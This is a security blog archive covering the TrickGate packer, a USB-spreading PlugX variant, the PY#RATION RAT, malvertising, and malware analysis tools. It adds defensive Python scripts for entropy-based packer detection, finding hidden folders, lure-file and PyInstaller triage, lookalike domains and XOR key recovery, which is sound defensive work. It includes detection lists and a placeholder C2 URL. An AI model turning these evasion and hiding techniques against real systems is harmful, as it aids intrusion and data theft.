Feb 03 2023

MAJORITY OF THE RANSOMWARE GANGS USED THIS PACKER TO BYPASS ANTIVIRUS AND ENCRYPT DEVICES

Category: Malware, Ransomware | DISC @ 11:02 am

Packers are becoming an increasingly important tool in the cybercriminal toolkit. On hacker forums a packer is often advertised as a “crypter” or as “FUD” (fully undetectable). Its primary function is to make malicious code harder for antivirus engines to identify, so that malware authors can distribute their payloads more widely and with fewer consequences. A commercial packer-as-a-service is payload-agnostic: the same wrapper can be applied to many different malicious samples, which is exactly what makes it attractive to criminals. It is also transformational: the wrapper is changed frequently, so signatures written against yesterday’s packed samples stop matching today’s.

According to Check Point Research, TrickGate is a good illustration of a robust and resilient packer-as-a-service. It has stayed under the radar of security researchers for years while steadily improving in a variety of ways.

Although a good deal of research has been done on the packer itself, TrickGate is a master of disguise and has been given several names over the years because it presents so many different characteristics, among them “TrickGate,” “Emotet’s packer,” “new loader,” “Loncom,” and “NSIS-based crypter.”

Check Point first observed TrickGate at the end of 2016, when it was being used to spread the Cerber ransomware. Since then the researchers have tracked it continuously and found it used to deliver many kinds of malicious tooling, including ransomware, RATs, information stealers, banking trojans, and miners. A significant number of APT groups and other threat actors employ TrickGate to wrap their code in order to evade security solutions. Some of the most widely distributed malware families have been wrapped by TrickGate, including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more.
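A packer that wraps arbitrary payloads leaves a fingerprint that does not depend on the payload: the packed region is compressed or encrypted, so its bytes are close to random. The script below is an added example written for this post (it is not Check Point’s tooling and is not TrickGate-specific). It parses only the parts of a PE header needed to walk the section table and scores each section’s raw bytes by Shannon entropy; the 7.0 cutoff is an assumed rule of thumb to be tuned against a real corpus, and the sample PE is constructed in memory rather than taken from a real binary.

```python
"""Section-entropy heuristic for spotting packed PE files (added example)."""
import hashlib
import math
import struct
from collections import Counter

ENTROPY_THRESHOLD = 7.0  # assumption: common rule-of-thumb cutoff; tune per corpus


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(pe: bytes):
    """Yield (name, raw_offset, raw_size) for every entry in the section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt_hdr = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt_hdr           # section table follows the optional header
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size


def section_report(pe: bytes):
    """Per-section (name, raw_size, entropy, suspicious) tuples."""
    report = []
    for name, off, size in pe_sections(pe):
        ent = shannon_entropy(pe[off:off + size])
        report.append((name, size, round(ent, 2), ent >= ENTROPY_THRESHOLD))
    return report


def looks_packed(pe: bytes) -> bool:
    """True when any section carries near-random data."""
    return any(flag for *_, flag in section_report(pe))


# --- constructed sample PE (not a real binary) --------------------------------
def deterministic_bytes(n: int, seed: bytes = b"packer-demo") -> bytes:
    """High-entropy filler from chained SHA-256 so the demo is reproducible."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(sections) -> bytes:
    """Assemble a minimal PE image from [(name, raw_bytes), ...]."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)  # no optional header
    table_off = e_lfanew + 4 + 20
    data_off = table_off + 40 * len(sections)
    table, body = b"", b""
    for name, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000, len(raw),
                             data_off + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    return dos + b"PE\0\0" + coff + table + body


LOW_ENTROPY_TEXT = (b"\x55\x8b\xec\x83\xec\x10" * 300) + b"kernel32.dll\0LoadLibraryA\0"
HIGH_ENTROPY_PACKED = deterministic_bytes(4096)
SAMPLE_PE = build_sample_pe([(b".text", LOW_ENTROPY_TEXT), (b".pack", HIGH_ENTROPY_PACKED)])

if __name__ == "__main__":
    for name, size, ent, flag in section_report(SAMPLE_PE):
        print(f"{name:<8} {size:>6} bytes  entropy={ent:.2f}  {'PACKED?' if flag else ''}")
    print("verdict:", "likely packed" if looks_packed(SAMPLE_PE) else "not flagged")
```

Entropy alone is a triage signal, not a verdict: legitimate installers, resource-heavy binaries and signed software with embedded compressed data also score high, so a hit should route a sample to dynamic analysis rather than straight to a block list.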

Tags: BYPASS ANTIVIRUS AND ENCRYPT DEVICES


Jan 28 2023

PlugX Malware Sneaks Onto Windows PCs Through USB Devices

Category: Malware, Windows Security | DISC @ 9:29 am

PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups.

The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise, since 95.6% of new malware and malware variants in 2022 targeted Windows.

According to Unit 42 researchers, the new variant was detected during an incident response engagement following a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victims’ devices, including the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.

The malware was previously used in many high-profile cyberattacks, such as the 2015 breach of the U.S. Office of Personnel Management (OPM).

The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.

Scope of Infection

The new variant stood out among other malware because it could infect any attached removable USB device (floppy, flash, or thumb drives) and, from there, any system the removable device was later plugged into.

So far no evidence connects the PlugX backdoor or GootLoader to the Black Basta ransomware group, and the researchers believe another actor could have deployed it. They also noted that the malware copies all Adobe PDF and Microsoft Word documents from the host into a hidden folder on the USB device, a folder the malware itself creates.


Malware Analysis

Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX is a wormable, second-stage implant. It infects USB devices and hides its files from the Windows file system as presented to the user, so the user would not suspect that their USB device is being used to exfiltrate data from the networks it is plugged into.

PlugX’s USB variant stands out because it uses a specific Unicode character, the non-breaking space (U+00A0), to hide files on a USB device plugged into a workstation. Windows does not render that character as a directory name, so the folder shows up as a nameless entry in Explorer.

Furthermore, the malware can hide actor files on a removable USB device through a novel technique that works even on the latest Windows OS.

The malware infects the host and copies its code onto any removable device connected to it, hiding the files in a recycle-bin folder on the device. Because Windows does not show hidden files by default, the malicious files in that folder are not displayed, and, surprisingly, they remain invisible even when the “show hidden files” setting is enabled. They can be viewed or recovered only from a Unix-like OS or by mounting the USB device in a forensic tool.
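Because Explorer hides the folder no matter what the view settings say, the practical check is to mount the suspect drive on a Linux box (or in a forensic tool) and look for directory names that contain nothing a human would see. The script below is an added example written for this post, not Unit 42’s code: it walks a mounted volume, flags directories whose names consist only of space, format or control characters (U+00A0 among them), and lists what they contain, since the variant stages copied PDF and Word documents in exactly such a folder. The demo volume is constructed in a temporary directory.

```python
"""Find directories hidden behind invisible Unicode names (added example)."""
import os
import shutil
import tempfile
import unicodedata

# Unicode general categories that never render a visible glyph
INVISIBLE_CATEGORIES = {"Zs", "Zl", "Zp", "Cf", "Cc"}


def is_invisible_name(name: str) -> bool:
    """True when every code point in `name` is a space, format or control character."""
    return bool(name) and all(unicodedata.category(ch) in INVISIBLE_CATEGORIES for ch in name)


def describe(name: str) -> list:
    """Code points of `name`, e.g. ['U+00A0'], so the report is unambiguous."""
    return [f"U+{ord(ch):04X}" for ch in name]


def scan_volume(root: str) -> list:
    """Return one record per suspicious directory found below `root`."""
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for d in dirnames:
            if not is_invisible_name(d):
                continue
            full = os.path.join(dirpath, d)
            entries = sorted(os.listdir(full))
            hits.append({
                "path": full,
                "codepoints": describe(d),
                "entries": entries,
                # the USB variant stages Office/PDF documents here before exfiltration
                "documents": [e for e in entries if e.lower().endswith((".pdf", ".doc", ".docx"))],
            })
    return hits


# --- constructed stand-in for a USB stick --------------------------------------
def build_demo_volume() -> str:
    """One normal folder plus one folder named with a single U+00A0 (constructed)."""
    root = tempfile.mkdtemp(prefix="usb_demo_")
    os.makedirs(os.path.join(root, "Photos"))
    hidden = os.path.join(root, "\u00a0")
    os.makedirs(hidden)
    for fname in ("report.docx", "invoice.pdf", "loader.dll"):
        with open(os.path.join(hidden, fname), "wb") as fh:
            fh.write(b"constructed sample content\n")
    return root


def remove_demo_volume(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    demo = build_demo_volume()
    try:
        for hit in scan_volume(demo):
            print(hit["codepoints"], "->", hit["entries"])
    finally:
        remove_demo_volume(demo)
```

Run it against the mount point of the drive (for example `/mnt/usb`) rather than against a copy made through Explorer, because a copy made on Windows would already have dropped the folder. On Windows itself the same walk works from Python, but the hidden and system attributes should be reported too (via `os.stat(...).st_file_attributes`), which this Linux-oriented version omits.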

Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threats

InfoSec books | InfoSec tools | InfoSec services

Tags: PlugX Malware


Jan 27 2023

New Python Malware Targeting Windows Devices

Category: Malware, Python | DISC @ 10:26 am

The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

Researchers at threat analysis firm Securonix have discovered new malware, dubbed PY#RATION, that allows attackers to steal sensitive files and log keystrokes on infected devices.

Malware Distribution Technique

The malware is distributed through a conventional phishing mechanism: the email carries a password-protected ZIP archive. When it is unpacked, two shortcut files disguised as images appear, named front.jpg.lnk and back.jpg.lnk. When launched, they display the front and back of a driver’s license that doesn’t exist.

[Figure] Images used in the scam (Credit: Securonix)

At the same time the malicious code executes, leading to two new files, front.txt and back.txt, being downloaded from the internet; these are then renamed to .bat files and executed. The malware disguises itself as the Cortana virtual assistant to maintain persistence on the system.

What is PY#RATION

PY#RATION is a Python-based malware that displays RAT (remote access trojan) behaviour to maintain control over the affected host. It has a range of capabilities, such as keylogging and data exfiltration.

The unusual aspect is that it uses WebSocket for both exfiltration and C2 communication, which helps it evade network security solutions and antivirus programs. Leveraging the Python Socket.IO library (a third-party package, not part of the standard library) for client and server WebSocket communication, the malware pulls data and receives commands over a single persistent TCP connection.

Moreover, according to the Securonix blog post, the attackers have used the same C2 address throughout, which the IPVoid reputation service had not yet blocked at the time of writing. The researchers believe the malware is under active development, as they have detected multiple versions since August 2022. The malware receives instructions from its operators over WebSocket and sends back the sensitive data it collects.

Potential Dangers

The Python RAT is packed into an executable with automated packers such as pyinstaller and py2exe, which convert Python code into Windows executables by bundling the interpreter alongside it. That bundling inflates the payload size: the first detected version, 1.0, was 14 MB, and the latest, 1.6.0, is 32 MB, with the script itself growing past 1,000 lines as code was added.
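Two cheap triage checks fall out of the lure chain and the packaging described above. The script below is an added example written for this post (not Securonix’s code): it lists ZIP entries whose final extension is executable but whose preceding extension pretends to be an image or document, like front.jpg.lnk, which works on a password-protected ZIP because entry names are not encrypted; and it decides whether a dropped Windows executable is a PyInstaller bundle by locating the archive cookie PyInstaller appends, reading the Python version out of it. The ZIP and the fake executable are constructed inline; the cookie layout is the one PyInstaller 2.1 and later write and that pyinstxtractor relies on.

```python
"""Triage helpers for a PY#RATION-style lure and a PyInstaller payload (added example)."""
import io
import struct
import zipfile

# Magic that PyInstaller writes at the start of its CArchive cookie
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# cookie layout (PyInstaller >= 2.1): magic, package length, TOC offset,
# TOC length, Python version, Python DLL name; big-endian, 88 bytes in total
COOKIE_FMT = "!8sIIII64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)

DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".txt"}
EXEC_EXTS = {".lnk", ".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta"}


def disguised_entries(zip_bytes: bytes) -> list:
    """Entry names like 'front.jpg.lnk': a decoy extension followed by an executable one."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:   # names are readable without the password
        for name in zf.namelist():
            parts = name.rsplit("/", 1)[-1].lower().split(".")
            if len(parts) >= 3 and "." + parts[-1] in EXEC_EXTS and "." + parts[-2] in DECOY_EXTS:
                hits.append(name)
    return hits


def pyinstaller_info(data: bytes):
    """(python_major, python_minor, dll_name) if `data` carries a PyInstaller cookie, else None."""
    pos = data.rfind(PYINSTALLER_MAGIC)   # search backwards: the cookie sits near the end
    if pos == -1 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, _pkg_len, _toc_off, _toc_len, pyver, dll = struct.unpack_from(COOKIE_FMT, data, pos)
    # version is encoded as 39 for Python 3.9 (older builds) or 310 for 3.10 (newer builds)
    major, minor = (pyver // 100, pyver % 100) if pyver >= 100 else (pyver // 10, pyver % 10)
    return major, minor, dll.rstrip(b"\0").decode("ascii", "replace")


# --- constructed samples --------------------------------------------------------
def build_lure_zip() -> bytes:
    """ZIP shaped like the phishing attachment; the shortcut bodies are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("front.jpg.lnk", b"constructed shortcut placeholder")
        zf.writestr("back.jpg.lnk", b"constructed shortcut placeholder")
        zf.writestr("readme.txt", b"harmless")
    return buf.getvalue()


def build_fake_bundle(pyver: int = 310, dll: bytes = b"python310.dll") -> bytes:
    """An MZ stub with a PyInstaller-style cookie appended (not a real bundle)."""
    cookie = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, 0x1000, 0x800, 0x200, pyver, dll)
    return b"MZ" + b"\0" * 510 + b"constructed archive data" + cookie


if __name__ == "__main__":
    print("disguised entries:", disguised_entries(build_lure_zip()))
    print("pyinstaller bundle:", pyinstaller_info(build_fake_bundle()))
```

A positive `pyinstaller_info` result on a multi-megabyte dropped binary is the cue to extract the embedded `.pyc` files and decompile them instead of reversing the interpreter stub; the version it reports tells you which Python to use for that.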

[Figure] Infection chain of the PY#RATION Python malware (Credit: Securonix)

The researchers report that the latest version of the payload is detected by only one antivirus engine listed on VirusTotal.

The malware’s features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookie exfiltration. Who is behind the campaign, its distribution volume, and its objectives are still unclear.

Python for Cybersecurity: Using Python for Cyber Offense and Defense


InfoSec books | InfoSec tools | InfoSec services

Tags: Python Malware


Jan 19 2023

Google ads increasingly pointing to malware

Category: Malware | DISC @ 11:13 am

The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing.

The recent explosion of search engine malvertising

Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users, and buying search engine ads that point to fake download pages is particularly good at hitting a wide pool of potential targets, since most internet users also use search engines.

Lately, though, they have been overdoing it – or perhaps it’s just that more people have begun noticing it and talking about it online?

Many documented campaigns

HP threat researcher Patrick Schläpfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.”

Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.).


The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturer’s page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).

Protect yourself and your loved ones

While Google and Microsoft are trying to keep their users safe, it is becoming obvious that they are failing to keep pace with the rapidly changing tricks cybercriminals use to get those ads approved.

As some ads are removed and new ones inevitably spring up, users are forced to do what they can to protect themselves.

Just being aware of this danger and knowing about the prevalence of these malicious ads will help. Also, carefully check whether the URL to which the advertisement points is the correct one (e.g., by comparing it with the official domain listed on the software’s Wikipedia page).
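The “compare the URL with the official domain” advice can be turned into a check that runs on every ad link before anyone clicks it. The script below is an added example written for this post, not code from the article or from Google or Microsoft. The allowlist holds the real project domains of some of the software named above; the lookalike URLs in the test are constructed under reserved .test names. It approximates the registrable domain as the last two labels (assumption: no public-suffix list, so a co.uk-style domain would need the publicsuffix2 package in real use), normalises the host with NFKC to catch full-width lookalike letters, and then classifies the host as official, lookalike, or unrelated.

```python
"""Classify the domain an ad points to against a vendor's official domain (added example)."""
import unicodedata
from urllib.parse import urlsplit

# real official domains of projects named in the article
OFFICIAL_DOMAINS = {
    "Notepad++": "notepad-plus-plus.org",
    "GIMP": "gimp.org",
    "7-Zip": "7-zip.org",
    "Blender": "blender.org",
    "Audacity": "audacityteam.org",
    "OBS Studio": "obsproject.com",
}


def hostname(url: str) -> str:
    """Lower-cased, NFKC-normalised host of `url` (scheme optional)."""
    if "://" not in url:
        url = "http://" + url
    host = urlsplit(url).hostname or ""
    return unicodedata.normalize("NFKC", host).lower().rstrip(".")


def registrable(host: str) -> str:
    """Last two labels; assumption: no public-suffix list is consulted."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str, official: str) -> str:
    """'official', 'lookalike' or 'unrelated' for a link that claims to be `official`."""
    host = hostname(url)
    dom = registrable(host)
    if dom == official:
        return "official"
    if host.startswith(official + "."):          # official name used as a subdomain of something else
        return "lookalike"
    sld = dom.rsplit(".", 1)[0]                  # second-level label, e.g. 'notepad-plus-plus'
    osld = official.rsplit(".", 1)[0]
    if sld == osld:                              # right name, wrong TLD
        return "lookalike"
    if levenshtein(sld, osld) <= 2:              # typo-squat
        return "lookalike"
    if osld.replace("-", "") in sld.replace("-", ""):   # brand embedded in a longer name
        return "lookalike"
    return "unrelated"


def check_ad(product: str, url: str) -> dict:
    """Verdict record for one ad link; `product` must be a key of OFFICIAL_DOMAINS."""
    official = OFFICIAL_DOMAINS[product]
    return {"product": product, "host": hostname(url), "official": official,
            "verdict": classify(url, official)}


if __name__ == "__main__":
    # the second link is a constructed lookalike under a reserved .test name
    for link in ("https://notepad-plus-plus.org/downloads/", "https://notepad-pius-plus.test/"):
        print(check_ad("Notepad++", link))
```

A “lookalike” verdict is a reason not to click, not proof of malice; an “unrelated” verdict on a download ad is just as suspicious, because a real vendor’s ad lands on the vendor’s own domain.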

If you fail to spot the malicious nature of the ad and the typosquatting site, don’t ignore warnings you might get from Microsoft Defender or another security solution you use.


But the best advice may be to completely avoid clicking on Google and Bing ads – either by recognizing them and avoiding them consciously, or by installing an ad-blocking extension that will stop those ads from being displayed. That latter option is perhaps the best one for less tech-savvy users, to completely remove the temptation of willy-nilly clicking on potentially malicious ads – wherever they might pop up.

Google and Microsoft, for their part, may want to ramp up their efforts to block this kind of abuse of their ad networks, or risk their reputations being dented and more and more users turning to ad blockers.

Learn Malware Removal Techniques: How to remove malwares from a computer

Check out our previous posts on the “Malware” topic

InfoSec books | InfoSec tools | InfoSec services

Tags: Google ads


Jan 07 2023

Best Malware Analysis Tools List For Security Researchers & Malware Analyst 2023

Category: Malware, Security Tools | DISC @ 1:24 pm

Malware analysis tools are essential for security professionals, who constantly need to learn new tools, techniques, and concepts to analyze sophisticated threats and current cyber attacks.

Most Important Security Tools and Resources For Security Researcher and Malware Analyst

Malware Analysis Tools & Courses

  • Malware Analysis Courses
  • Hex Editors
  • Disassemblers
  • Detection and Classification
  • Dynamic Binary Instrumentation
  • Dynamic Analysis
  • Deobfuscation
  • Debugging
  • Reverse Engineering
  • Binary Analysis
  • Decompiler
  • Bytecode Analysis
  • Reconstruction
  • Memory Forensics
  • Windows Artifacts
  • Storage and Workflow
  • Malware samples
  • Domain Analysis
  • Books

Malware Analysis Courses

Here we have listed the best courses for malware analysis, reverse engineering, exploit development and more.

Hex Editors

A hex editor (or binary file editor or byte editor) is a type of computer program that allows manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’, a standard numerical format for representing binary data.

Disassemblers 

A disassembler is a computer program that translates machine language into assembly language, the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline – A scalable distributed file analysis framework.
  • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • ClamAV – Open source antivirus engine.
  • Detect-It-Easy – A program for determining types of files.
  • ExifTool – Read, write and edit file metadata.
  • File Scanning Framework – Modular, recursive file scanning solution.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework.
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • totalhash.py – Python script for easy searching of the TotalHash.cymru.com database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate YARA rules based on a set of malware samples. Also contains a good strings DB to avoid false positives.

Dynamic Binary Instrumentation

Dynamic Binary Instrumentation Tools

Mac Decrypt

Mac Decrypting Tools

Emulator

Emulator Tools

Document Analysis

Document Based Malware Analysis Tools.

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected with various tools.

The class is hands-on: students use various tools to look at how malware is persisting, communicating, and hiding.

Deobfuscation Malware Analysis Tools

Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker – A generic hidden code extractor for Windows malware.
  • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple of programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.
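Several of the tools above (XORSearch, XORBruteForcer, unxor, NoMoreXOR, xortool) implement variations of the same two ideas, and it helps to have seen them in a few dozen lines. The script below is an added example for this section; it is not code from any listed tool. A single-byte key is brute-forced and ranked by how plausible the result looks (printable ratio plus known-plaintext markers such as the DOS stub string). A repeating key is handled by first estimating its length from how often bytes coincide at each candidate period, then solving each key byte from the observation that the most frequent plaintext byte in padded PE data is 0x00. The plaintext is a constructed PE-like blob, not a real binary, and the C2 URL in it is a placeholder under a reserved .test name.

```python
"""Recover single-byte and repeating XOR keys from an encoded blob (added example)."""
from collections import Counter

# known-plaintext markers that show up in most Windows executables and droppers
MARKERS = (b"MZ", b"This program cannot be run in DOS mode", b"kernel32.dll", b"http")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def plausibility(buf: bytes) -> float:
    """Fraction of printable/NUL bytes, plus a bonus for each marker string present."""
    ok = sum(1 for b in buf if b == 0 or 32 <= b < 127 or b in (9, 10, 13))
    return ok / max(len(buf), 1) + 2.0 * sum(m in buf for m in MARKERS)


def brute_single_byte(enc: bytes):
    """Try all 256 keys; return (key, decoded) for the most plausible plaintext."""
    key = max(range(256), key=lambda k: plausibility(xor_with_key(enc, bytes([k]))))
    return key, xor_with_key(enc, bytes([key]))


def guess_key_length(enc: bytes, max_len: int = 16) -> int:
    """Period at which ciphertext bytes coincide most often; ties go to the shortest period."""
    rates = {}
    for period in range(1, max_len + 1):
        n = len(enc) - period
        rates[period] = sum(enc[i] == enc[i + period] for i in range(n)) / n
    top = max(rates.values())
    return min(p for p, r in rates.items() if r >= 0.9 * top)


def recover_repeating_key(enc: bytes, key_len: int = None):
    """Assume the most frequent plaintext byte in each key column is 0x00 (PE padding)."""
    key_len = key_len or guess_key_length(enc)
    key = bytes(Counter(enc[col::key_len]).most_common(1)[0][0] for col in range(key_len))
    return key, xor_with_key(enc, key)


# --- constructed PE-like plaintext (not a real binary) -------------------------
SAMPLE_PLAINTEXT = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 48
    + b"This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 200
    + b"PE\x00\x00"
    + b"\x00" * 120
    + b"kernel32.dll\x00CreateFileA\x00WriteFile\x00"
    + b"\x00" * 160
    + b"http://c2.example.test/gate.php\x00"   # placeholder, reserved .test domain
    + b"\x00" * 128
)

if __name__ == "__main__":
    enc = xor_with_key(SAMPLE_PLAINTEXT, b"\x5a\x13\xc7\x09")
    period = guess_key_length(enc)
    key, dec = recover_repeating_key(enc, period)
    print(f"key length {period}, key {key.hex()}, markers found:",
          [m for m in MARKERS if m in dec])
```

The 0x00 assumption is what makes the repeating-key step work on PE files and padded configs; on compressed or text-only payloads it fails, and the fallback is to score each column with the same plausibility function used for the single-byte case.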

Debugging

In this list we see the tools for disassemblers, debuggers, and other static and dynamic analysis tools.

Cross-Platform Debugging Tools

Windows-Only Debugging Tools

Linux-Only Debugging Tools

Reverse Engineering 

  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect – Identifies and extracts information from bots and other malware.
  • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary Ninja – A reverse engineering platform that is an alternative to IDA.
  • Binwalk – Firmware analysis tool.
  • Bokken – GUI for Pyew and Radare. (mirror)
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper – The macOS and Linux Disassembler.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma – Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer – Advanced task manager for Windows.
  • Process Hacker – Tool that monitors system resources.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • PSTools – Windows command-line tools that help manage and investigate live systems.
  • Pyew – Python tool for malware analysis.
  • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD – QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 – Reverse engineering framework, with debugger support.
  • RegShot – Registry compare utility that compares snapshots.
  • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
  • strace – Dynamic analysis for Linux executables.
  • Triton – A dynamic binary analysis (DBA) framework.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • WinDbg – Multipurpose debugger for the Microsoft Windows operating system, used to debug user mode applications, device drivers, and kernel-mode memory dumps.
